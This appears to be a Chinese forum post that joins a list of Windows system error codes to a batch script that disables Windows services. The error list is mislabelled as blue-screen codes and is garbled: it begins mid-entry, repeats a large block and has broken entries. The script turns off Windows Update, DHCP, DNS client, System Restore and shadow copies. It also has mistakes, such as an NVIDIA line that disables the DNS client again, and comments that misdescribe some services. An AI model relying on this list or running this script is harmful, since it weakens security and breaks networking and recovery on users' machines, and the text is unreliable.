(DLL) 起始例程失败。 1115 0x0000045B 系统正在关机。 1116 0x0000045C 无法中止系统关机,因为没有关机的动作在进行中。 1117 0x0000045D 因为 I/O 装置发生错误,所以无法执行要求。 1118 0x0000045E 序列装置起始失败,会取消加载序列驱动程序。 1119 0x0000045F 无法开启装置。这个装置与其它装置共享岔断要求 (IRQ)。至少已经有一个使用同一IRQ 的其它装置已经开启。 1120 0x00000460 A serial I/O operation was completed by another write to the serial port(The IOCTL_SERIAL_x0000OFF_COUNTER reached zero.) 1121 0x00000461 因为已经过了逾时时间,所以序列 I/O 作业完成。 (IOCTL_SERIAL_x0000OFF_COUNTER 不是零。) 1122 0x00000462 在磁盘找不到任何的 ID 地址标示。 1123 0x00000463 磁盘扇区 ID 字段与磁盘控制卡追踪地址 不符。 1124 0x00000464 软式磁盘驱动器控制卡回报了一个软式磁盘驱动器驱动程序无法识别的错误。 1125 0x00000465 软式磁盘驱动器控制卡传回与缓存器中不一致的结果。 1126 0x00000466 存取硬盘失败,重试后也无法作业。 1127 0x00000467 存取硬盘失败,重试后也无法作业。 1128 0x00000468 存取硬盘时,必须重设磁盘控制卡,但是 连重设的动作也失败。 1129 0x00000469 到了磁带的最后。 1130 0x0000046A 可用服务器储存空间不足,无法处理这项指令。 1131 0x0000046B 发现潜在的死锁条件。 1132 0x0000046C 指定的基本地址或档案位移没有适当 对齐。 1140 0x00000474 尝试变更系统电源状态,但其它的应用程序或驱动程序拒绝。 1141 0x00000475 系统 BIOS 无法变更系统电源状态。 1150 0x0000047E 指定的程序需要新的 Windows 版本。 1151 0x0000047F 指定的程序不是 Windows 或 MS-DOS 程序。 1152 0x00000480 指定的程序已经激活,无法再激活一次。 1153 0x00000481 指定的程序是为旧版的 Windows 所写的。 1154 0x00000482 执行此应用程序所需的链接库档案之一毁损。 1155 0x00000483 没有应用程序与此项作业的指定档案建立关联。 1156 0x00000484 传送指令到应用程序发生错误。 1157 0x00000485 找不到执行此应用程序所需的链接库档案。 1200 0x000004B0 指定的装置名称无效。 1201 0x000004B1 装置现在虽然未联机,但是它是一个记忆联机。 1202 0x000004B2 尝试记忆已经记住的装置。 1203 0x000004B3 提供的网络路径找不到任何网络提供程序。 1203 0x000004B3 提供的网络路径找不到任何网络提供程序。 1204 0x000004B4 指定的网络提供程序名称错误。 1205 0x000004B5 无法开启网络联机设定文件。 1206 0x000004B6 网络联机设定文件坏掉。 1207 0x000004B7 无法列举非容器。 1208 0x000004B8 发生延伸的错误。 1209 0x000004B9 指定的群组名称错误。 1210 0x000004BA 指定的计算机名称错误。 1211 0x000004BB 指定的事件名称错误。 1212 0x000004BC 指定的网络名称错误。 1213 0x000004BD 指定的服务名称错误。 1214 0x000004BE 指定的网络名称错误。 1215 0x000004BF 指定的资源共享名称错误。 1216 0x000004C0 指定的密码错误。 1217 0x000004C1 指定的讯息名称错误。 1218 0x000004C2 指定的讯息目的地错误。 1219 0x000004C3 所提供的条件与现有的条件组发生冲突。 1220 0x000004C4 尝试与网络服务器联机,但是 与该服务器的联机已经太多。 1221 0x000004C5 其它网络计算机已经在使用这个工作群组或网域名称。
windows蓝屏错误代码 1 0×00000001 不正确的函数。 2 0×00000002 系统找不到指定的档案。 3 0×00000003 系统找不到指定的路径。 4 0×00000004 系统无法开启档案。 5 0×00000005 拒绝存取。 6 0×00000006 无效的代码。 7 0×00000007 储存体控制区块已毁。 8 0×00000008 储存体空间不足,无法处理这个指令。 9 0×00000009 储存体控制区块地址无效。 10 0×0000000A 环境不正确。 11 0×0000000B 尝试加载一个格式错误的程序。 12 0×0000000C 存取码错误。 13 0×0000000D 资料错误。 14 0×0000000E 储存体空间不够,无法完成这项作业。 15 0×0000000F 系统找不到指定的磁盘驱动器。 16 0×00000010 无法移除目录。 16 0×00000010 无法移除目录。 17 0×00000011 系统无法将档案移到 其它的磁盘驱动器。 18 0×00000012 没有任何档案。 19 0×00000013 储存媒体为写保护状态。 20 0×00000014 系统找不到指定的装置。 21 0×00000015 装置尚未就绪。 22 0×00000016 装置无法识别指令。 23 0×00000017 资料错误 (cyclic redundancy check) 24 0×00000018 程序发出一个长度错误的指令。 25 0×00000019 磁盘驱动器在磁盘找不到 持定的扇区或磁道。 26 0×0000001A 指定的磁盘或磁盘无法存取。 27 0×0000001B 磁盘驱动器找不到要求的扇区。 28 0×0000001C 打印机没有纸。 29 0×0000001D 系统无法将资料写入指定的磁盘驱动器。 30 0×0000001E 系统无法读取指定的装置。 31 0×0000001F 连接到系统的某个装置没有作用。 32 0×00000020 The process cannot access the file because it is being used by another process. 33 0×00000021 档案的一部份被锁定, 现在无法存取。 34 0×00000022 磁盘驱动器的磁盘不正确。 请将 %2 (Volume Serial Number: %3) 插入磁盘机%1。 36 0×00000024 开启的分享档案数量太多。 38 0×00000026 到达档案结尾。 39 0×00000027 磁盘已满。 50 0×00000032 不支持这种网络要求。 51 0×00000033 远程计算机无法使用。 52 0×00000034 网络名称重复。 53 0×00000035 网络路径找不到。 54 0×00000036 网络忙碌中。 55 0×00000037 The specified network resource or device is no longer available. 56 0×00000038 The network BIOS command limit has been reached. 57 0×00000039 网络配接卡发生问题。 58 0×0000003A 指定的服务器无法执行要求的作业。 59 0×0000003B 网络发生意外错误。 60 0×0000003C 远程配接卡不兼容。 61 0×0000003D 打印机队列已满。 62 0×0000003E 服务器的空间无法储存等候打印的档案。 63 0×0000003F 等候打印的档案已经删除。 64 0×00000040 指定的网络名称无法使用。 65 0×00000041 拒绝存取网络。 65 0×00000041 拒绝存取网络。 66 0×00000042 网络资源类型错误。 67 0×00000043 网络名称找不到。 68 0×00000044 超过区域计算机网络配接卡的名称限制。 69 0×00000045 超过网络 BIOS 作业阶段的限制。 70 0×00000046 远程服务器已经暂停或者正在起始中。 71 0×00000047 由于联机数目已达上限,此时无法再联机到这台远程计算机。 72 0×00000048 指定的打印机或磁盘装置已经暂停作用。 80 0×00000050 档案已经存在。 82 0×00000052 无法建立目录或档案。 83 0×00000053 INT 24 失败 84 0×00000054 处理这项要求的储存体无法使用。 85 0×00000055 近端装置名称已经在使用中。 86 0×00000056 指定的网络密码错误。 87 0×00000057 参数错误。 88 0×00000058 网络发生资料写入错误。 89 0×00000059 此时系统无法执行其它行程。 100 0×00000064 无法建立其它的系统 semaphore。 101 0×00000065 属于其它行程专用的 semaphore. 102 0×00000066 semaphore 已经设定,而且无法关闭。 103 0×00000067 无法指定 semaphore 。 104 0×00000068 在岔断时间无法要求专用的 semaphore 。 104 0×00000068 在岔断时间无法要求专用的 semaphore 。 105 0×00000069 此 semaphore 先前的拥有权已经结束。 106 0×0000006A 请将磁盘插入 %1。 107 0×0000006B 因为代用的磁盘尚未插入,所以程序已经停止。 108 0×0000006C 磁盘正在使用中或被锁定。 109 0×0000006D Pipe 已经中止。 110 0×0000006E 系统无法开启指定的 装置或档案。 111 0×0000006F 档名太长。 112 0×00000070 磁盘空间不足。 113 0×00000071 没有可用的内部档案标识符。 114 0×00000072 目标内部档案标识符不正确。 117 0×00000075 由应用程序所执行的 IOCTL 呼叫 不正确。 118 0×00000076 写入验证参数值不正确。 119 0×00000077 系统不支持所要求的指令。 120 0×00000078 此项功能仅在 Win32 模式有效。 121 0×00000079 semaphore 超过逾时期间。 122 0×0000007A 传到系统呼叫的资料区域 太小。 123 0×0000007B 文件名、目录名称或储存体卷标语法错误。 124 0×0000007C 系统呼叫层次不正确。 125 0×0000007D 磁盘没有设定卷标。 126 0×0000007E 找不到指定的模块。 127 0×0000007F 找不到指定的程序。 128 0×00000080 没有子行程可供等待。 128 0×00000080 没有子行程可供等待。 129 0×00000081 %1 这个应用程序无法在 Win32 模式下执行。 130 0×00000082 Attempt to use a file handle to an open disk partition for an operation other than raw disk I/O. 131 0×00000083 尝试将档案指针移至档案开头之前。 132 0×00000084 无法在指定的装置或档案,设定档案指针。 133 0×00000085 JOIN 或 SUBST 指令 无法用于 内含事先结合过的磁盘驱动器。 134 0×00000086 尝试在已经结合的磁盘驱动器,使用 JOIN 或 SUBST 指令。 135 0×00000087 尝试在已经替换的磁盘驱动器,使 用 JOIN 或 SUBST 指令。 136 0×00000088 系统尝试删除 未连结过的磁盘驱动器的连结关系。 137 0×00000089 系统尝试删除 未替换过的磁盘驱动器的替换关系。 138 0×0000008A 系统尝试将磁盘驱动器结合到已经结合过之磁盘驱动器的目录。 139 0×0000008B 系统尝试将磁盘驱动器替换成已经替换过之磁盘驱动器的目录。 140 0×0000008C 系统尝试将磁盘驱动器替换成已经替换过之磁盘驱动器的目录。 141 0×000000 系统尝试将磁盘驱动器 SUBST 成已结合的磁盘驱动器 目录。 142 0×0000008E 系统此刻无法执行 JOIN 或 SUBST。 143 0×0000008F 系统无法将磁盘驱动器结合或替换同一磁盘驱动器下目录。 144 0×00000090 这个目录不是根目录的子目录。 145 0×00000091 目录仍有资料。 146 0×00000092 指定的路径已经被替换过。 147 0×00000093 资源不足,无法处理这项 指令。 148 0×00000094 指定的路径这时候无法使用。 148 0×00000094 指定的路径这时候无法使用。 149 0×00000095 尝试要结合或替换的磁盘驱动器目录,是已经替换过的的目标。 150 0×00000096 CONFIG.SYS 文件未指定系统追踪信息,或是追踪功能被取消。 151 0×00000097 指定的 semaphore事件 DosMuxSemWait 数目不正确。 152 0×00000098 DosMuxSemWait 没有执行;设定太多的 semaphore。 153 0×00000099 DosMuxSemWait 清单不正确。 154 0×0000009A 您所输入的储存媒体标 元长度限制。 155 0×0000009B 无法建立其它的执行绪。 156 0×0000009C 接收行程拒绝接受信号。 157 0×0000009D 区段已经被舍弃,无法被锁定。 158 0×0000009E 区段已经解除锁定。 159 0×0000009F 执行绪识别码的地址不正确。 160 0×000000A0 传到 DosExecPgm 的自变量字符串不正确。 161 0×000000A1 指定的路径不正确。 162 0×000000A2 信号等候处理。 164 0×000000A4 系统无法建立执行绪。 167 0×000000A7 无法锁定档案的部份范围。 170 0×000000AA 所要求的资源正在使用中。 173 0×000000AD 取消范围的锁定要求不明显。 174 0×000000AE 档案系统不支持自动变更锁定类型。 180 0×000000B4 系统发现不正确的区段号码。 182 0×000000B6 操作系统无法执行 %1。 182 0×000000B6 操作系统无法执行 %1。 183 0×000000B7 档案已存在,无法建立同一档案。 186 0×000000BA 传送的旗号错误。 187 0×000000BB 指定的系统旗号找不到。 188 0×000000BC 操作系统无法执行 %1。 189 0×000000BD 操作系统无法执行 %1。 190 0×000000BE 操作系统无法执行 %1。 191 0×000000BF 无法在 Win32 模式下执行 %1。 192 0×000000C0 操作系统无法执行 %1。 193 0×000000C1 %1 不是正确的 Win32 应用程序。 194 0×000000C2 操作系统无法执行 %1。 195 0×000000C3 操作系统无法执行 %1。 196 0×000000C4 操作系统无法执行 这个应用程序。 197 0×000000C5 操作系统目前无法执行 这个应用程序。 198 0×000000C6 操作系统无法执行 %1。 199 0×000000C7 操作系统无法执行 这个应用程序。 200 0×000000C8 程序代码的区段不可以大于或等于 64KB。 201 0×000000C9 操作系统无法执行 %1。 202 0×000000CA 操作系统无法执行 %1。 203 0×000000CB 系统找不到输入的环境选项。\r 205 0×000000CD 在指令子目录下,没有任何行程有信号副处理程序。 206 0×000000CE 文件名称或扩展名太长。 207 0×000000CF ring 2 堆栈使用中。 207 0×000000CF ring 2 堆栈使用中。 208 0×000000D0 输入的通用档名字元 * 或 ? 不正确, 或指定太多的通用档名字元。 209 0×000000D1 所传送的信号不正确。 210 0×000000D2 无法设定信号处理程序。 212 0×000000D4 区段被锁定,而且无法重新配置。 214 0×000000D6 附加到此程序或动态连结模块的动态连结模块太多。 215 0×000000D7 Can’t nest calls to LoadModule. 230 0×000000E6 The pipe state is invalid. 231 0×000000E7 所有的 pipe instances 都在忙碌中。 232 0×000000E8 The pipe is being closed. 233 0×000000E9 No process is on the other end of the pipe. 234 0×000000EA 有更多可用的资料。 240 0×000000F0 作业阶段被取消。 254 0×000000FE 指定的延伸属性名称无效。 255 0×000000FF 延伸的属性不一致。 259 0×00000103 没有可用的资料。 266 0×0000010A 无法使用 Copy API。 267 0×0000010B 目录名称错误。 275 0×00000113 延伸属性不适用于缓冲区。 276 0×00000114 在外挂的档案系统上的延伸属性档案已经毁损。 277 0×00000115 延伸属性表格文件满。 278 0×00000116 指定的延伸属性代码无效。 278 0×00000116 指定的延伸属性代码无效。 282 0×0000011A 外挂的这个档案系统不支持延伸属性。 288 0×00000120 意图释放不属于叫用者的 mutex。 298 0×0000012A semaphore 传送次数过多。 299 0×0000012B 只完成 Read/WriteProcessMemory 的部份要求。 317 0×0000013D 系统找不到位于讯息文件 %2 中编号为 0×0000%1 的讯息。 487 0×000001E7 尝试存取无效的地址。 534 0×00000216 运算结果超过 32 位。 535 0×00000217 信道的另一端有一个行程在接送资料。 536 0×00000218 等候行程来开启信道的另一端。 994 0×000003E2 存取延伸的属性被拒。 995 0×000003E3 由于执行绪结束或应用程序要求,而异常终止 I/O 作业。 996 0×000003E4 重叠的 I/O 事件不是设定成通知状态。 997 0×000003E5 正在处理重叠的 I/O 作业。 998 0×000003E6 对内存位置的无效存取。 999 0×000003E7 执行 inpage 作业发生错误。 1001 0×000003E9 递归太深,堆栈满溢。 1002 0×000003EA 窗口无法用来传送讯息。 1003 0×000003EB 无法完成这项功能。 1004 0×000003EC 旗号无效。 1005 0×000003ED 储存媒体未含任何可辨识的档案系统。 请确定以加载所需的系统驱动程序,而且该储存媒体并未毁损。 1006 0×000003EE 储存该档案的外部媒体发出警告,表示该已开启档案已经无效。 1007 0×000003EF 所要求的作业无法在全屏幕模式下执行。 1008 0×000003F0 An attempt was made to reference a token that does not exist. 1009 0×000003F1 组态系统登录数据库毁损。 1010 0×000003F2 组态系统登录机码无效。 1011 0×000003F3 无法开启组态系统登录机码。 1012 0×000003F4 无法读取组态系统登录机码。 1013 0×000003F5 无法写入组态系统登录机码。 1014 0×000003F6 系统登录数据库中的一个档案必须使用记录或其它备份还原。 已经还原成功。 1015 0×000003F7 系统登录毁损。其中某个档案毁损、或者该档案的 系统映对内存内容毁损、会是档案无法复原。 1016 0×000003F8 系统登录起始的 I/O 作业发生无法复原的错误。 系统登录无法读入、写出或更新,其中的一个档案 内含系统登录在内存中的内容。 1017 0×000003F9 系统尝试将档案加载系统登录或将档案还原到系统登录中, 但是,指定档案的格式不是系统登录文件的格式。 1018 0×000003FA 尝试在标示为删除的系统登录机码,执行不合法的操作。 1018 0×000003FA 尝试在标示为删除的系统登录机码,执行不合法的操作。 1019 0×000003FB 系统无法配置系统登录记录所需的空间。 1020 0×000003FC 无法在已经有子机码或数值的系统登录机码建立符号连结。 1021 0×000003FD 无法在临时机码下建立永久的子机码。 1022 0×000003FE 变更要求的通知完成,但信息 并未透过呼叫者的缓冲区传回。呼叫者现在需要自行列举档案,找出变更的地方。 1051 0×0000041B 停止控制已经传送给其它服务 所依峙的一个服务。 1052 0×0000041C 要求的控制对此服务无效 1053 0×0000041D The service did not respond to the start or control request in a timely fashion. 1054 0×0000041E 无法建立服务的执行绪。 1055 0×0000041F 服务数据库被锁定。 1056 0×00000420 这种服务已经在执行。 1057 0×00000421 帐户名称错误或者不存在。 1058 0×00000422 指定的服务暂停作用,无法激活。 1059 0×00000423 指定循环服务从属关系。 1060 0×00000424 指定的服务不是安装进来的服务。 1061 0×00000425 该服务项目此时无法接收控制讯息。 1062 0×00000426 服务尚未激活。 1063 0×00000427 无法联机到服务控制程序。 1064 0×00000428 处理控制要求时,发生意外状况。 1065 0×00000429 指定的数据库不存在。 1065 0×00000429 指定的数据库不存在。 1066 0×0000042A 服务传回专属于服务的错误码。 1067 0×0000042B The process terminated unexpectedly. 1068 0×0000042C 从属服务或群组无法激活。 1069 0×0000042D 因为登入失败,所以没有激活服务。 1070 0×0000042E 在激活之后,服务在激活状态时当机。 1071 0×0000042F 指定服务数据库锁定无效。 1072 0×00000430 指定的服务已经标示为删除。 1073 0×00000431 指定的服务已经存在。 1074 0×00000432 系统目前正以上一次执行成功的组态执行。 1075 0×00000433 从属服务不存在,或已经标示为删除。 1076 0×00000434 目前的激活已经接受上一次执行成功的 控制设定。 1077 0×00000435 上一次激活之后,就没有再激活服务。 1078 0×00000436 指定的名称已经用于服务名称或服务显示 名称。 1100 0×0000044C 已经到了磁带的最后。 1101 0×0000044D 到了档案标示。 1102 0×0000044E 遇到磁带的开头或分割区。 1103 0×0000044F 到了档案组的结尾。 1104 0×00000450 磁带没有任何资料。 1105 0×00000451 磁带无法制作分割区。 1106 0×00000452 存取多重容体的新磁带时,发现目前 区块大小错误。 1107 0×00000453 加载磁带时,找不到磁带分割区信息。 1108 0×00000454 无法锁住储存媒体退带功能。 1108 0×00000454 无法锁住储存媒体退带功能。 1109 0×00000455 无法解除加载储存媒体。 1110 0×00000456 磁盘驱动器中的储存媒体已经变更。 1111 0×00000457 已经重设 I/O 总线。 1112 0×00000458 磁盘驱动器没有任何储存媒体。 1113 0×00000459 目标 multi-byte code page,没有对应 Unicode 字符。 1114 0×0000045A 动态链接库 (DLL) 起始例程失败。 1115 0×0000045B 系统正在关机。 1116 0×0000045C 无法中止系统关机,因为没有关机的动作在进行中。 1117 0×0000045D 因为 I/O 装置发生错误,所以无法执行要求。 1118 0×0000045E 序列装置起始失败,会取消加载序列驱动程序。 1119 0×0000045F 无法开启装置。这个装置与其它装置共享岔断要求 (IRQ)。 至少已经有一个使用同一IRQ 的其它装置已经开启。 1120 0×00000460 A serial I/O operation was completed by another write to the serial port. (The IOCTL_SERIAL_XOFF_COUNTER reached zero.) 1121 0×00000461 因为已经过了逾时时间,所以序列 I/O 作业完成。(IOCTL_SERIAL_XOFF_COUNTER 不是零。) 1122 0×00000462 在磁盘找不到任何的 ID 地址标示。 1123 0×00000463 磁盘扇区 ID 字段与磁盘控制卡追踪地址 不符。 1124 0×00000464 软式磁盘驱动器控制卡回报了一个软式磁盘驱动器驱动程序无法识别的错误。 1125 0×00000465 软式磁盘驱动器控制卡传回与缓存器中不一致的结果。 1126 0×00000466 存取硬盘失败,重试后也无法作业。 1127 0×00000467 存取硬盘失败,重试后也无法作业。 1128 0×00000468 存取硬盘时,必须重设磁盘控制卡,但是 连重设的动作也失败。 1129 0×00000469 到了磁带的最后。 1130 0×0000046A 可用服务器储存空间不足,无法处理这项指令。 1131 0×0000046B 发现潜在的死锁条件。 1132 0×0000046C 指定的基本地址或档案位移没有适当 对齐。 1140 0×00000474 尝试变更系统电源状态,但其它的应用程序或驱动程序拒绝。 1141 0×00000475 系统 BIOS 无法变更系统电源状态。 1150 0×0000047E 指定的程序需要新的 Windows 版本。 1151 0×0000047F 指定的程序不是 Windows 或 MS-DOS 程序。 1152 0×00000480 指定的程序已经激活,无法再激活一次。 1153 0×00000481 指定的程序是为旧版的 Windows 所写的。 1154 0×00000482 执行此应用程序所需的链接库档案之一毁损。 1155 0×00000483 没有应用程序与此项作业的指定档案建立关联。 1156 0×00000484 传送指令到应用程序发生错误。 1157 0×00000485 找不到执行此应用程序所需的链接库档案。 1200 0×000004B0 指定的装置名称无效。 1201 0×000004B1 装置现在虽然未联机,但是它是一个记忆联机。 1202 0×000004B2 尝试记忆已经记住的装置。 1203 0×000004B3 提供的网络路径找不到任何网络提供程序。 1203 0×000004B3 提供的网络路径找不到任何网络提供程序。 1204 0×000004B4 指定的网络提供程序名称错误。 1205 0×000004B5 无法开启网络联机设定文件。 1206 0×000004B6 网络联机设定文件坏掉。 1207 0×000004B7 无法列举非容器。 1208 0×000004B8 发生延伸的错误。 1209 0×000004B9 指定的群组名称错误。 1210 0×000004BA 指定的计算机名称错误。 1211 0×000004BB 指定的事件名称错误。 1212 0×000004BC 指定的网络名称错误。 1213 0×000004BD 指定的服务名称错误。 1214 0×000004BE 指定的网络名称错误。 1215 0×000004BF 指定的资源共享名称错误。 1216 0×000004C0 指定的密码错误。 1217 0×000004C1 指定的讯息名称错误。 1218 0×000004C2 指定的讯息目的地错误。 1219 0×000004C3 所提供的条件与现有的条件组发生冲突。 1220 0×000004C4 尝试与网络服务器联机,但是 与该服务器的联机已经太多。 1221 0×000004C5 其它网络计算机已经在使用这个工作群组或网域名称。 1222 0×000004C6 网络没有显示出来或者没有激活。 1223 0×000004C7 使用者已经取消作业。 1224 0×000004C8 要求的作业无法在已经开启使用者对应区段的档案执行。 1225 0×000004C9 远程系统拒绝网络联机。 1225 0×000004C9 远程系统拒绝网络联机。 1226 0×000004CA 关闭网络联机。 1227 0×000004CB 网络传输端点已经有相关连的地址。 1228 0×000004CC 地址尚未有相关的网络端点。 1229 0×000004CD 尝试在不存在的网络连线作业。 1230 0×000004CE 在作用中的网络联机上执行无效的作业。 1231 0×000004CF 无法传输到远程网络。 1232 0×000004D0 无法联机到远程系统。 1233 0×000004D1 远程系统不支持传输通讯协议。 1234 0×000004D2 远程系统的目的地网络端点没有作何执行中的服务。 1235 0×000004D3 要求已经中止。 1236 0×000004D4 进端系统已经中断网络联机。 1237 0×000004D5 无法完成作业,请重试。 1238 0×000004D6 无法与服务器联机,原因是这个帐户已经到达同时联机数目 的上限。 1239 0×000004D7 尝试在这个帐户未授权的时间登入网络。 1240 0×000004D8 这个帐户无法从这个地方登入网络。 1241 0×000004D9 网络地址无法用于这个要求的作业。 1242 0×000004DA 服务已经登记。 1243 0×000004DB 指定的服务不存在。 1244 0×000004DC 作业无法执行,原因是使用者尚未授权使用。 1245 0×000004DD 要求的作业无法执行,原因是使用者尚未登入网络。 指定的服务不存在。 1246 0×000004DE 传回要求呼叫者继续工作的讯息。 1247 0×000004DF 在完成起始作业之后,尝试再执行起始作业。 1248 0×000004E0 没有其它的近端装置。 1300 0×00000514 并未指定所有的参照权限给呼叫者。 1301 0×00000515 帐户名称与安全识别码之间尚有未执行完成的联机。 1302 0×00000516 此帐户并未设定特别的系统配额限制。 1303 0×00000517 没有可用的加密机码。传回一个已知的加密机码。 1304 0×00000518 NT 密码太复杂,无法转换成 LAN Manager 密码。传回的LAN Manager密码是一个空字符串。 1305 0×00000519 修正层次不详。 1306 0×0000051A 表示两个修订阶层不兼容。 1307 0×0000051B 此安全识别码无法指定为这个对象的拥有者。 1308 0×0000051C 此安全识别码无法指定为主要的对象群组。 1309 0×0000051D An attempt has been made to operate on an impersonation token by a thread that is not currently impersonating a client. 1310 0×0000051E 不可以关闭群组。 1311 0×0000051F 目前没有可登入的服务器,所以无法处理登入要求。 1312 0×00000520 指定登入作业阶段不存在。该作业阶段可能已经 结束。 1313 0×00000521 指定的权限不存在。 1313 0×00000521 指定的权限不存在。 1314 0×00000522 客户端未列出要求的权限。 1315 0×00000523 所提供的名称格式与帐户名称不符。 1316 0×00000524 指定的使用者已经存在。 1317 0×00000525 指定的使用者不存在。 1318 0×00000526 指定的群组已经存在。 1319 0×00000527 指定的群组不存存。 1320 0×00000528 指定的使用者帐户已经是指定群组的成员,或 指定的群组因为内含成员而无法删除。 1321 0×00000529 指定的使用者帐户不是指定的群组帐户成员。 1322 0×0000052A 上一次留下来的管理帐户无法关闭或 删除。 1323 0×0000052B 无法更新密码。所输入的密码不正确。 1324 0×0000052C 无法更新密码。所输入的新密码内含不符合 密码规定。 1325 0×0000052D 因为违反密码更新规则,所以无法更新密码。 1326 0×0000052E 登入失败: 无法辨识的使用者名称或密码错误。 1327 0×0000052F 登入失败: 使用者帐户限制。 1328 0×00000530 登入失败: 违反帐户登入时间限制。 1329 0×00000531 登入失败: 使用者不可登入这部计算机。 1330 0×00000532 登入失败: 指定的帐户密码过期。 1331 0×00000533 登入失败: 帐户目前无效。 1332 0×00000534 帐户名称与帐户识别码不符。 1333 0×00000535 一次要求太多的近端使用者识别码 (local user identifiers,LUIDs)。 1333 0×00000535 一次要求太多的近端使用者识别码 (local user identifiers,LUIDs)。 1334 0×00000536 没有可用的近端使用者识别码 (local user identifiers ,LUIDs)。 1335 0×00000537 安全识别码的转授权部份对这个特殊用法无效。 1336 0×00000538 无效的存取控制清单结构。 1337 0×00000539 安全识别码结构无效。 1338 0×0000053A 安全叙述子结构无效。 1340 0×0000053C 无法建立继承的存取控制清单或存取控件目。 1341 0×0000053D 服务器目前无效。 1342 0×0000053E 服务器目前可以使用。 1343 0×0000053F 所提供的值是无效的识别码授权值。 1344 0×00000540 没有可供安全信息更新使用的内存。 1345 0×00000541 指定的属性无效,或指定的属性与整个群
@echo off ::automatic updates -windows自动更新,靠,滚! sc stop wuauserv sc config wuauserv start= disabled ::clipbook - 用与局域网电脑来共享 粘贴/剪贴的内容。(靠,想得出!) sc stop clipsrv sc config clipsrv start= disabled ::com+Event system -一些 COM+ 软件需要,检查你的 c:\program files\ComPlus Applications 目录,没东西可以把这个服务关闭. sc stop eventsystem sc config eventsystem start= disabled ::COM+Event system application -同上 sc stop comsysapp sc config comsysapp start= disabled ::COmputer browser - 用来浏览局域网电脑的服务,但关了也不影响浏览!垃圾 sc stop Browser sc config Browser start= disabled ::DHCP client-静态IP者需要(xDSL 等)小猫就不用了!! sc stop dhcp sc config dhcp start= disabled ::Distributed link tracking client-用于局域网更新连接信息,比如在电脑A有个文件,在B做了个连接,如果文件移动了,这个服务将会更新信息。占用4兆内存。 sc stop trkwks sc config trkwks start= disabled ::Distributed Transaction coordinator-无聊的东西。 sc stop msdtc sc config msdtc start= disabled ::DNS Client-DNS解析服务。。无聊~~ sc stop dnscache sc config dnscache start= disabled ::Fast user switching compatibility-多用户快速切换服务..无聊 sc stop fastuserswitchingcompatibility sc config fastuserswitchingcompatibility start= disabled ::IMAPI CD-burning COM service -xp刻牒服务,用软件就不用了占用1。6兆内存 sc stop imapiservice sc config imapiservice start= disabled ::IPSEC Services-大众用户连边都沾不上。 sc stop policyagent sc config policyagent start= disabled ::Logical Disk manager -磁盘管理服务。。需要时它会通知你,所以一般关。 sc stop dmserver sc config dmserver start= disabled ::Logical Disk manager administrative service-同上。 sc stop dmadmin sc config dmadmin start= disabled ::messenger -不是msn,不想被骚扰的话就关。注:妖刺就是利用这个。 sc stop messenger sc config messenger start= disabled ::Net Logon-登陆domai controller 用的,大众用户快关! sc stop netlogon sc config netlogon start= disabled ::Netmeeting remote desktop sharing-用netmeeting实现电脑共享。。晕!关! sc stop mnmsrvc sc config mnmsrvc start= disabled ::Network DDE -和clipbook一起用的,无聊~~~~ sc stop netdde sc config netdde start= disabled ::Network DDE DSDM -同上 sc stop netddedsdm sc config netddedsdm start= disabled ::Network Location Awareness-如有网络共享或ICS/ICF可能需要.(服务器端) sc stop nla sc config nla start= disabled ::NT LM Security support provider-telnet 服务用的东东,关!! sc stop ntlmssp sc config ntlmssp start= disabled ::NVIDIA Driver Helper service -nvidia 显卡帮助,关! sc stop dnscache sc config dnscache start= disabled ::Portable media serial number-绝对无用,无聊之及。 sc stop wmdmpmsn sc config wmdmpmsn start= disabled ::QoS RSVP -关!就是那个20%的 QoS sc stop rsvp sc config rsvp start= disabled ::Remote desktop help session manager-远程帮助服务,傻透,占用4兆内存。 sc stop rdsessmgr sc config rdsessmgr start= disabled ::remote registry -远程注册表运行/修改。大漏洞,还不快关!! sc stop remoteregistry sc config remoteregistry start= disabled ::routing and remote access-哈哈。。不知者关! sc stop remoteaccess sc config remoteaccess start= disabled ::secondary logon-给与administrator 以外的用户分配指定操作权.晕~~~ sc stop seclogon sc config seclogon start= disabled ::server -局域网文件/打印共享需要的。 sc stop lanmanserver sc config lanmanserver start= disabled ::smart card -关!1。4兆内存 sc stop scardsvr sc config scardsvr start= disabled ::SSDP Discovery service-没有什么硬件利用这个服务。。 sc stop ssdpsrv sc config ssdpsrv start= disabled ::system restore service -系统还原服务,吃资源和内存的怪兽。。虽然有时用到,自己决定。 sc stop srservice sc config srservice start= disabled ::TCP/IP NetBIOS helper-如果你的网络不用 Netbios 或WINS,关了. sc stop lmhosts sc config lmhosts start= disabled ::telnet -大漏洞,我第一个关的就是这个.这根dos中 telnet 命令没关系。2兆内存。 sc stop tlntsvr sc config tlntsvr start= disabled ::universal plug and play device host-同SSDP Discovery Service ,没用. sc stop upnphost sc config upnphost start= disabled ::volume shadow copy-同MS Software Shadow Copy Provider,无用. sc stop vss sc config vss start= disabled ::Windows Installer -windows的MSI安装服务,建议设成手动。 sc stop msiserver sc config msiserver start= demand

2,640

社区成员

发帖
与我相关
我的任务
社区描述
VC/MFC 硬件/系统
社区管理员
  • 硬件/系统社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧